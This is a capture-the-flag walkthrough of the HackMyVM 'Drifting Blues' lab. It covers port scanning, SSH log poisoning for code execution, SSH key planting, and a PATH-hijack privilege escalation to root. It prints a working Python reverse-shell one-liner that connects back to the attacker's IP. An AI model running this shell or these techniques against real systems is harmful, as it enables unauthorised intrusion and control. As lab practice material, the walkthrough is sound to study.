# HackMyVM-Drifiting Blues
## Netdiscover
## NMAP
```
Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-09 00:43 PKT
Nmap scan report for 192.168.1.9
Host is up (0.00034s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 6a:fe:d6:17:23:cb:90:79:2b:b1:2d:37:53:97:46:58 (RSA)
| 256 5b:c4:68:d1:89:59:d7:48:b0:96:f3:11:87:1c:08:ac (ECDSA)
|_ 256 61:39:66:88:1d:8f:f1:d0:40:61:1e:99:c5:1a:1f:f4 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
| http-robots.txt: 1 disallowed entry
|_/eventadmins
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 08:00:27:EE:16:C7 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.33 seconds
```
We have 2 ports open http and ssh and we have robots.txt on the webserver
## PORT 80 (HTTP)
## Dirbuster
Running dirbuster we can see there is `robots.txt` , `secret` and `wp-admin` which tells that there is wordpress running on the machine and these directories are interesting to us.
We visit `robots.txt`
From there we can see it doesn't allow `/eventadmins` to be shown on webcrawlers
So `john` and `buddyG` might be the two usernames also visiting `littlequeenofspades.html`
We would find a base64 encoded text
On further decoding the text
We will get a page `adminsfixit.php`
Here we can see ssh authorization log which logs about the users when anyone tries to login with a username and gives success or failed attempt message
As you can see when we interact with SSH it gets log I tried to login with `arz` and it got logged.Now let's try to add php `GET` paramter which will test if we can get Remote Code Execution or not
And it did worked
***Note : My private IP was changed due to a change of network also if your doing something with special characters bash is the way to go , we need to be careful with special characters when using zsh shell. ***
Now I'll check for python if it is installed with `which python`
Great now I'll setup the python reverse shell
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.43.129",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
And we are in !!!
Stabilize the shell with python
This might work differently in zsh shell
Now we find a user named `robertj` and we can write to the `.ssh` directory so generate a ssh key pair with `ssh-keygen` on your host machine and transfer it through wget or python server
As you can see we are hosting the public and private key so we need only public on the target machine and private with us to communicate with it.Copy the contents of `id_rsa.pub` move to target machine and rename it to `authorized_keys` in the `.ssh` folder.
## Privilege Escalation
Now let's find if there are SUID binaries on the box
Through this find command we found a binary named `getinfo` which is not normal to have SUID it belongs to user `root` and group `operator` looking our UID and GID we are in operators group so we can do something with it.
On running the binary
It basically is running the following commands in the binary
So here what we can do is make a file with the name of `ip` put `/bin/bash` in it make it executable and change the PATH variable which is known as "Exploiting PATH variable"
And now when we'll run the binary
We will be root !!!